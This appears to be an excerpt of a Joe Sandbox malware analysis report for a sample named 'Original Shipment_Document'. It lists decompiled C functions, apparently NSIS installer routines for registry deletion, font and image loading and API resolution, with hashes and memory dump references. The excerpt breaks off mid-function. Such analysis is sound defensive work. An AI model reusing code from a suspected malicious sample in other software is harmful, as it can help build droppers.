                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                                                • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                • Opcode Fuzzy Hash: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                                                • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC1979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E6EAC1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x6eac506c = _a8;
				_t77 = 0;
				 *0x6eac5070 = _a16;
				_v12 = 0;
				_v8 = E6EAC12E3();
				_t90 = E6EAC13B1(_t42);
				_t87 = _t85;
				_t81 = E6EAC12E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E6EAC12E3();
					_t77 = E6EAC13B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E6EAC1510(_t85, _t90, _t87,  &_v76);
								E6EAC1312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E6EAC3050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E6EAC3070(_t59, _t83, _t85);
						} else {
							_t48 = E6EAC30A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E6EAC2EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E6EAC2F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E6EAC2EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                0x6eac1979
                                                0x6eac1983
                                                0x6eac198c
                                                0x6eac198f
                                                0x6eac1994
                                                0x6eac199d
                                                0x6eac19a6
                                                0x6eac19a8
                                                0x6eac19af
                                                0x6eac19b1
                                                0x6eac19b4
                                                0x6eac19bb
                                                0x6eac19c9
                                                0x6eac19d2
                                                0x6eac19d7
                                                0x6eac19da
                                                0x6eac19e0
                                                0x6eac19e0
                                                0x6eac19e3
                                                0x6eac19e6
                                                0x6eac19e9
                                                0x6eac1ab1
                                                0x6eac1ab1
                                                0x6eac1ab4
                                                0x6eac1b34
                                                0x6eac1b39
                                                0x6eac1b48
                                                0x6eac1b4b
                                                0x6eac1b53
                                                0x6eac1b53
                                                0x6eac1b53
                                                0x6eac1b55
                                                0x6eac1b55
                                                0x6eac1b56
                                                0x6eac1b56
                                                0x6eac1b58
                                                0x6eac1b5a
                                                0x6eac1b60
                                                0x6eac1b69
                                                0x6eac1b7a
                                                0x6eac1b85
                                                0x6eac1b85
                                                0x6eac1b4d
                                                0x6eac1b2f
                                                0x6eac1b2f
                                                0x6eac1b31
                                                0x6eac1b31
                                                0x00000000
                                                0x6eac1b31
                                                0x6eac1b4f
                                                0x6eac1b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1b51
                                                0x6eac1b3d
                                                0x6eac1b41
                                                0x00000000
                                                0x6eac1b41
                                                0x6eac1ab6
                                                0x6eac1ab6
                                                0x6eac1ab7
                                                0x6eac1b26
                                                0x6eac1b28
                                                0x00000000
                                                0x00000000
                                                0x6eac1b2a
                                                0x6eac1b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1b2d
                                                0x6eac1ab9
                                                0x6eac1ab9
                                                0x6eac1aba
                                                0x6eac1af7
                                                0x6eac1afc
                                                0x6eac1b19
                                                0x6eac1b1c
                                                0x00000000
                                                0x00000000
                                                0x6eac1b1e
                                                0x00000000
                                                0x00000000
                                                0x6eac1b20
                                                0x6eac1b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1b24
                                                0x6eac1afe
                                                0x6eac1b03
                                                0x6eac1b05
                                                0x6eac1b07
                                                0x6eac1b09
                                                0x6eac1b12
                                                0x6eac1b0b
                                                0x6eac1b0b
                                                0x6eac1b0b
                                                0x00000000
                                                0x6eac1b09
                                                0x6eac1abc
                                                0x6eac1abc
                                                0x6eac1abf
                                                0x6eac1af0
                                                0x6eac1af2
                                                0x00000000
                                                0x6eac1af2
                                                0x6eac1ac1
                                                0x6eac1ac1
                                                0x6eac1ac4
                                                0x6eac1ad7
                                                0x6eac1adc
                                                0x6eac1ae9
                                                0x6eac1aeb
                                                0x00000000
                                                0x6eac1aeb
                                                0x6eac1ade
                                                0x6eac1ae0
                                                0x00000000
                                                0x00000000
                                                0x6eac1ae2
                                                0x6eac1ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1ae7
                                                0x6eac1ac7
                                                0x6eac1ac8
                                                0x6eac1ace
                                                0x6eac1ad0
                                                0x6eac1ad0
                                                0x00000000
                                                0x6eac1ac8
                                                0x6eac19ef
                                                0x6eac1a68
                                                0x6eac1a6a
                                                0x6eac1a6d
                                                0x6eac1a8b
                                                0x6eac1a8e
                                                0x6eac1a94
                                                0x6eac1a99
                                                0x6eac1a6f
                                                0x6eac1a6f
                                                0x6eac1a73
                                                0x6eac1a77
                                                0x6eac1a79
                                                0x6eac1a79
                                                0x6eac1a9c
                                                0x6eac1aa0
                                                0x00000000
                                                0x6eac1aa6
                                                0x6eac1aa6
                                                0x6eac1aa9
                                                0x00000000
                                                0x6eac1aa9
                                                0x6eac1aa0
                                                0x6eac19f1
                                                0x6eac19f4
                                                0x6eac1a59
                                                0x6eac1a5b
                                                0x6eac1a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1a63
                                                0x6eac19f6
                                                0x6eac19f9
                                                0x00000000
                                                0x00000000
                                                0x6eac19fb
                                                0x6eac19fc
                                                0x6eac1a32
                                                0x6eac1a37
                                                0x6eac1a4f
                                                0x6eac1a51
                                                0x00000000
                                                0x6eac1a51
                                                0x6eac1a39
                                                0x6eac1a3b
                                                0x00000000
                                                0x00000000
                                                0x6eac1a41
                                                0x6eac1a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1a4a
                                                0x6eac19fe
                                                0x6eac1a01
                                                0x6eac1a28
                                                0x00000000
                                                0x6eac1a03
                                                0x6eac1a03
                                                0x6eac1a04
                                                0x6eac1a18
                                                0x6eac1a1a
                                                0x6eac1a06
                                                0x6eac1a08
                                                0x6eac1a0e
                                                0x6eac1a10
                                                0x6eac1a10
                                                0x6eac1a08
                                                0x00000000
                                                0x6eac1a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 78456c3da1610513eb488a39c8a18f76c19094acb178732d294c8172c62a5493
                                                • Instruction ID: 0888e80ce43c1613086d9c080fc482a515e17048f39803d8d8860ad4c67f2c71
                                                • Opcode Fuzzy Hash: 78456c3da1610513eb488a39c8a18f76c19094acb178732d294c8172c62a5493
                                                • Instruction Fuzzy Hash: 0351E332F0410AAE8F409FE985405BDBAB9EF65B08F158559D610B3210E771ADCE8B9F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                • Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32 ref: 00401E84
                                                  • Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                  • Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000), ref: 00406743
                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
                                                • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                • Opcode Fuzzy Hash: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
                                                • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6EAC16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                0x6eac16d7
                                                0x6eac16e3
                                                0x6eac16f0
                                                0x6eac16f7
                                                0x6eac1700
                                                0x6eac170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6EAC22D8,?,00000808), ref: 6EAC16D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6EAC22D8,?,00000808), ref: 6EAC16DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6EAC22D8,?,00000808), ref: 6EAC16F0
                                                • GetProcAddress.KERNEL32(6EAC22D8,00000000), ref: 6EAC16F7
                                                • GlobalFree.KERNEL32 ref: 6EAC1700
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 4abe238332bb5b229b7acbdde458092f4102621a1526db339ff827f91aeab9dd
                                                • Instruction ID: 736ce13aa32a8165d233c9fde8f320ab188d97f977aa398a36ae2d16c45e36d6
                                                • Opcode Fuzzy Hash: 4abe238332bb5b229b7acbdde458092f4102621a1526db339ff827f91aeab9dd
                                                • Instruction Fuzzy Hash: 38F01C722466387BDA2016A68C4CC9BBE9CEF8B6F5B124211F628E2190C6654C03D7F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
